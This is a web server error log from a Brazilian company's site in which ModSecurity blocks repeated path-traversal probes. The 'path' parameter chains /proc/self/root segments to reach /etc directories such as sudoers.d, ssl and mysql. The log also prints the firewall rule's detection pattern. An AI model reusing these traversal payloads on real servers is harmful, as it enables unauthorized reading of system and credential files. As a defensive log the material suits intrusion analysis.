[Tue Mar 17 20:36:51.405541 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:59170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlk9a6ubjKNq_cu4Yr2gAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:53.122192 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57784] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:36:53.896352 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:59182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnllda6ubjKNq_cu4Yr3AAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:36:58.262993 2026] [:error] [pid 6296:tid 140411733534464] [client 74.7.241.31:59196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlmnIk7brgkOH-rIWxwgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:11.486500 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:41434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlp9Y0UrI5A3LftIwkuwAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:15.123952 2026] [proxy_fcgi:error] [pid 29151:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58230] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:37:18.237614 2026] [:error] [pid 11088:tid 140411632822016] [client 74.7.241.31:49160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlrmmqtCojLHvu5cKOXgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:19.997687 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.241.31:38474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlrxj0p0SRWAqcjGGe9QAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:21.466950 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:38482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlseyqAr6etmhZHNpMAwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:24.035514 2026] [:error] [pid 11088:tid 140411683178240] [client 74.7.241.31:38494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnltGmqtCojLHvu5cKOYQAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:26.870565 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:38496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnltcdf6f5d65gmYZRh2QAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:28.230054 2026] [:error] [pid 6296:tid 140411624429312] [client 74.7.241.31:38556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnluHIk7brgkOH-rIWxyQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:40.843515 2026] [access_compat:error] [pid 6296:tid 140411582465792] [client 216.73.216.191:58540] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 20:37:47.133801 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58670] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:37:47.706038 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:38562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnlyxj0p0SRWAqcjGGe-wAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:37:48.895689 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.244.43:40162] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnlzNY0UrI5A3LftIwkwwAAAY0"]
[Tue Mar 17 20:37:53.255094 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:47644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl0da6ubjKNq_cu4Yr6AAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:11.121834 2026] [proxy_fcgi:error] [pid 16449:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59128] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:38:12.867278 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.228.61:47644] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnl5PPqhzTj3BvfDX-teAAAAc0"]
[Tue Mar 17 20:38:14.411636 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:47658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl5Yh-PF_25v4hFRCPhgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:15.449900 2026] [:error] [pid 16449:tid 140411691570944] [client 74.7.243.128:36998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl50eQbjTSjgbmHFr1uAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:18.451902 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.243.128:47402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl6oh-PF_25v4hFRCPjAAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:38:19.163417 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:37226] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl64h-PF_25v4hFRCPjQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:20.886013 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:44566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl7Na6ubjKNq_cu4Yr8AAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:23.839944 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:44582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl7tY0UrI5A3LftIwkzwAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:28.488333 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:44584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl9Ih-PF_25v4hFRCPkwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:30.474267 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:36942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl9uyqAr6etmhZHNpMGAAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:31.929139 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.241.31:36956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl93Ik7brgkOH-rIWx1QAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
